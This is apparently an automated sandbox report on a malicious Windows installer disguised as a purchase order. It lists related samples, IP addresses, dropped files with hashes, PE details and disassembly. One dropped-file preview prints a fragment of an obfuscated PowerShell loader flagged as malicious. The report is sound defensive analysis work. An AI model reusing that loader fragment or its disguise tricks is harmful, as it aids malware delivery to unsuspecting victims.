                                              • 199.232.214.172
                                              ax-0001.ax-msedge.netDqEJwd61Uw.exeGet hashmaliciousZhark RATBrowse
                                              • 150.171.27.10
                                              8E273IHyAW.exeGet hashmaliciousLummaC StealerBrowse
                                              • 150.171.27.10
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 150.171.28.10
                                              WeFGstOEUF.exeGet hashmaliciousAkiraBrowse
                                              • 150.171.28.10
                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                              • 150.171.27.10
                                              https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcbGet hashmaliciousUnknownBrowse
                                              • 150.171.28.10
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 150.171.27.10
                                              https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                              • 150.171.28.10
                                              eRApzqPkL1.exeGet hashmaliciousRHADAMANTHYSBrowse
                                              • 150.171.28.10
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 150.171.27.10

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              UNREAL-SERVERSUSla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 162.251.123.175
                                              file.exeGet hashmaliciousRedLineBrowse
                                              • 212.162.149.48
                                              https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                              • 172.96.10.214
                                              scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 162.251.122.87
                                              1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                              • 212.162.149.63
                                              purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 212.162.149.66
                                              Juleferien.exeGet hashmaliciousFormBookBrowse
                                              • 212.162.149.128
                                              Juleferien.exeGet hashmaliciousFormBookBrowse
                                              • 212.162.149.128
                                              RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                              • 162.251.122.86
                                              PO-RFQ-824-URGENT-SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                                              • 185.149.234.209

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):0.7263010769412562
                                              Encrypted:false
                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0s:9JZj5MiKNnNhoxup
                                              MD5:911EB9ACE9F7EAA2FF57A8F67EA480C4
                                              SHA1:BC0594AC334A93AF3F1AC333639E0D1B9539D0AF
                                              SHA-256:8DCE14C899F050524595B383B28D7D8FBB4730BD6C19D46093EE2A8A812456E8
                                              SHA-512:52B18B43CB69AE293A0B1F191BA3DA2B47F29EE1EA72B9997ED7973A6371B38E00210CA14C68A5E83F8D398595FD38B37F810456FB39FA60AF31172BA6345F18
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0x4f719ed0, page size 16384, DirtyShutdown, Windows version 10.0
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):0.7555793339809903
                                              Encrypted:false
                                              SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                              MD5:0C3965EA7BE819AB3BCA73550FCAB26A
                                              SHA1:48D48B71DBC0EE57075D83539BEA3B93DE5FDE20
                                              SHA-256:6EC0052419CAAA54910068D7DD9AFDDD74F106B9C1B3C65B56DE9186C164D743
                                              SHA-512:B35F30A0C4EE1643E7E6715F55A6DF799E3B7FE3758F17BEC1D66ED29E5211DE18FA99D933B1C584F4F6CBB4F03FB9FC7731B178E754779602A3600ACE732DDE
                                              Malicious:false
                                              Reputation:low
                                              Preview:Oq..... .......7.......X\...;...{......................0.e......!...{?.# ...|}.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{......................................# ...|...................'..# ...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:PGP Secret Sub-key -
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.07804908567540941
                                              Encrypted:false
                                              SSDEEP:3:sllEYexWvY0ENaAPaU1lxxZo/YlluxmO+l/SNxOf:slyzxo8NDPaU6IgmOH
                                              MD5:0E6A8A1C820A143F1A001CDA0AD0509F
                                              SHA1:8CC57EA68E0E304C9771C1D4E6BC33CEB7FDF7BD
                                              SHA-256:2676A513ED6E3A3F2E720F734817E3C488EC7F8E2EE7721E5A59D4446A6B6E39
                                              SHA-512:A688C1FAEA642F1344AAB5D56E129A85064223C131528298ED65EE08B4A588EDA35A008ED653BFDA2CFBCB145204DBDCBEF38713ADB4D5E30E6EE5863909D11B
                                              Malicious:false
                                              Reputation:low
                                              Preview:........................................;...{..# ...|...!...{?..........!...{?..!...{?..g...!...{?..................'..# ...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):53158
                                              Entropy (8bit):5.062687652912555
                                              Encrypted:false
                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                              MD5:5D430F1344CE89737902AEC47C61C930
                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Auktionshus\tallness.ber

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):493903
                                              Entropy (8bit):1.2514017425028907
                                              Encrypted:false
                                              SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                              MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                              SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                              SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                              SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                              Malicious:false
                                              Reputation:low
                                              Preview:..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (4007), with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):72113
                                              Entropy (8bit):5.17724752382159
                                              Encrypted:false
                                              SSDEEP:1536:lXVp+M8yiZL5EnBeoRdfy3Ipfo19ZWSopUFlsfIu6iB:lXVYM8oEcdyYpfeCSGYGfIuP
                                              MD5:AEDFD50E55B0E8F3433601DAD7C1F38D
                                              SHA1:7CC271875BCDBA41F48CB48A2D7D246C62FBFFDC
                                              SHA-256:A7E80D1C200DA7D3B41CB9CCD2F063FD96518176FC7CFD00B8BA11287898E719
                                              SHA-512:5466525ED7D7A0A496D84AE99FB8BD653A058647941FB71197FB71263B75DD7D089C20996B4574FC39A6C7683A954B7C22B9AAC215EFE16BC046D44EA827290C
                                              Malicious:true
                                              Preview:$Darkishristning167=$Darkisharberry;........$Exonerating = @'.Liparid.ruddssp$PeremptUYirkvoip Zrutylp SelvtgiKirke,inJordskrgFideism=Svin fa$Ha,burgVEmpiremeKonturtrpontiffdLnniveaeFancymon Ud,ignsneronizh imograiRetracts OverhetSpaantaoLeveranrGrandfiiTammieheWid hwanMultice;Elektri.GivensyfRe.ysteuGlob linJasmin.c eclastAlkaminivintereoToraengnCons.rt Almose,UFrondesnRetsided SkolepsrsteropaB.stnintterror,tFrekveneTild,ni B gfjer( Asyl a$AtlanteSStochasa KamleopTroublewForstrro Vici urS enuldtPsiloci,Agonise$ UvaergDDisscepaQuiabesr F,ettekVejreneiC romopsTilbag h Discon)Luftva Anaesth{ Art.re.Chapins.Handels$PoemetsOBygningc.ystemieEdgiestaDieselmnSpindleo Repr.sl MorphooJulero gBrugs niSparekacMaculacakomedielbu,rito Nondef.(SkdeslsOApteroiuSpikiert Indramb Japa.elDi hearuSolstrasParaffitUdbragteLamel ir ortolk iddend'TrissedD Vlvel.ede eylitGris es.CarnivonCampagntUd olkne Unrigh$StandarP.mdeskrrFuturisoDemas ucAfriv ieFiskesnnAksellet HeptylSP ntomoCPhilanth arendaAandsarpM

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Undrape.occ

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):333305
                                              Entropy (8bit):7.601702850334325
                                              Encrypted:false
                                              SSDEEP:6144:1j+MSbZZ2i0mtF+t090Ae4rdMIzvcND6DFX/yIjiZ5ssCFPYB6/7PVvFy5V8JNtD:m19rdv7cV6DFX/bu5ssCWBavW+Dm87
                                              MD5:8EA702AC3695C13B2A4CA8290DF4A145
                                              SHA1:D37449C5E37800DD33A3494D3E673BFE9C6C65E7
                                              SHA-256:7519724601AEFDB16FADE3D275F2C1FB068EE9D0D359F46A216921748B857FED
                                              SHA-512:FDDF5167C09174C6AA3F3471A29646B13FB325ED07C76D6D09EBAD2C475EB92AFA2C8244CBEE8A9625076D4217CB2BBFAD13D64E84E7C2057C4FE940EBCE7487
                                              Malicious:false
                                              Preview:................}................MM.~....................................6.........KK.........>.k./..OOOO.........K.......'''.........oo.......5..........oo........S.....[[[[.............X.......+.ggggg...QQ.............EEE......Y.................k.*.....................w.....|....ttt..[[[............cc......+.(...~~....***....444......%.h..CC......@.jj.................~.....!!!.VVV.....eee........N.kk.....................................N.........aaa..z.........p.............................................................*........RR...............................|...;...................??....r.......{..........t......PP.Q..............U..P..................+++......PPP...5....A.........)....YY.....i.!!.=...........................q.\....&&.KK.................................TT..............11....|............JJ........,..c...................)...a.....BB............qq....... .......Q....DD.|...........3....PP.......................)...........TT.........RR.................7..JJJ....F.

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\acology.mar

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):437071
                                              Entropy (8bit):1.253825384833456
                                              Encrypted:false
                                              SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                              MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                              SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                              SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                              SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                              Malicious:false
                                              Preview:.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels\vaklende.sna

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):340924
                                              Entropy (8bit):1.2553271369192232
                                              Encrypted:false
                                              SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                              MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                              SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                              SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                              SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                              Malicious:false
                                              Preview:......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................

                                              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\straffesager.tra

                                              Download File
                                              Process:C:\Users\user\Desktop\PO. A-72 9234567.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):484281
                                              Entropy (8bit):1.2585657408825282
                                              Encrypted:false
                                              SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                              MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                              SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                              SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                              SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                              Malicious:false
                                              Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....

                                              C:\Users\user\AppData\Local\Temp\Notanencephalia.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):798970
                                              Entropy (8bit):7.827643763105386
                                              Encrypted:false
                                              SSDEEP:24576:UXqzrTMuVyaP2e4MQ7Ttmg6aZ4QT31V1how:WK4uVa77Ttmg1Z4S3H1
                                              MD5:3454DF1E0AC8785872448AA049B8D91E
                                              SHA1:05C146FE06C33B2AF95992C74BAF58AA1972CE8F
                                              SHA-256:F0472B2EE2791D7DA13D5549F157624EFD81F3D17198CCE9378F5F6CFE2C8850
                                              SHA-512:19C233AC4F7B0861C9424E25A7A63A8495B61DCC2F8B5403474FBF3644D8181BC94A7D6A2C6C508AD65B8E03FD5FC10C89F1A5A3B0673603024CE9C103EA0151
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 21%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\Notanencephalia.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d01a0ros.ehj.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecxbfofu.c2e.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1icnbwm.fzp.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2d5ikju.twq.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.306461250274409
                                              Encrypted:false
                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                              Malicious:false
                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.827643763105386
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:PO. A-72 9234567.exe
                                              File size:798'970 bytes
                                              MD5:3454df1e0ac8785872448aa049b8d91e
                                              SHA1:05c146fe06c33b2af95992c74baf58aa1972ce8f
                                              SHA256:f0472b2ee2791d7da13d5549f157624efd81f3d17198cce9378f5f6cfe2c8850
                                              SHA512:19c233ac4f7b0861c9424e25a7a63a8495b61dcc2f8b5403474fbf3644d8181bc94a7d6a2c6c508ad65b8e03fd5fc10c89f1a5a3b0673603024ce9c103ea0151
                                              SSDEEP:24576:UXqzrTMuVyaP2e4MQ7Ttmg6aZ4QT31V1how:WK4uVa77Ttmg1Z4S3H1
                                              TLSH:F40502917691123FC16D813BB1672B71EBAB9FA8527368026123FF0F75367627E08643
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

                                              File Icon

                                              Icon Hash:71868ed4e8b04d49

                                              Static PE Info

                                              General

                                              Entrypoint:0x40351c
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000003F8h
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebp, ebp
                                              push 00008001h
                                              mov dword ptr [esp+20h], ebp
                                              mov dword ptr [esp+18h], 0040A2D8h
                                              mov dword ptr [esp+14h], ebp
                                              call dword ptr [004080A4h]
                                              mov esi, dword ptr [004080A8h]
                                              lea eax, dword ptr [esp+34h]
                                              push eax
                                              mov dword ptr [esp+4Ch], ebp
                                              mov dword ptr [esp+0000014Ch], ebp
                                              mov dword ptr [esp+00000150h], ebp
                                              mov dword ptr [esp+38h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007F6608EDC74Ah
                                              lea eax, dword ptr [esp+34h]
                                              mov dword ptr [esp+34h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [esp+48h]
                                              mov ecx, dword ptr [esp+62h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [esp+0000014Eh], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [esp+00000148h], ax
                                              cmp dword ptr [esp+38h], 0Ah
                                              jnc 00007F6608EDC718h
                                              and word ptr [esp+42h], 0000h
                                              mov eax, dword ptr [esp+40h]
                                              movzx ecx, byte ptr [esp+3Ch]
                                              mov dword ptr [00429AD8h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [esp+38h]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [esp+00000148h]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx
                                              movzx ecx, byte ptr [esp+0000004Eh]

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1f780.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
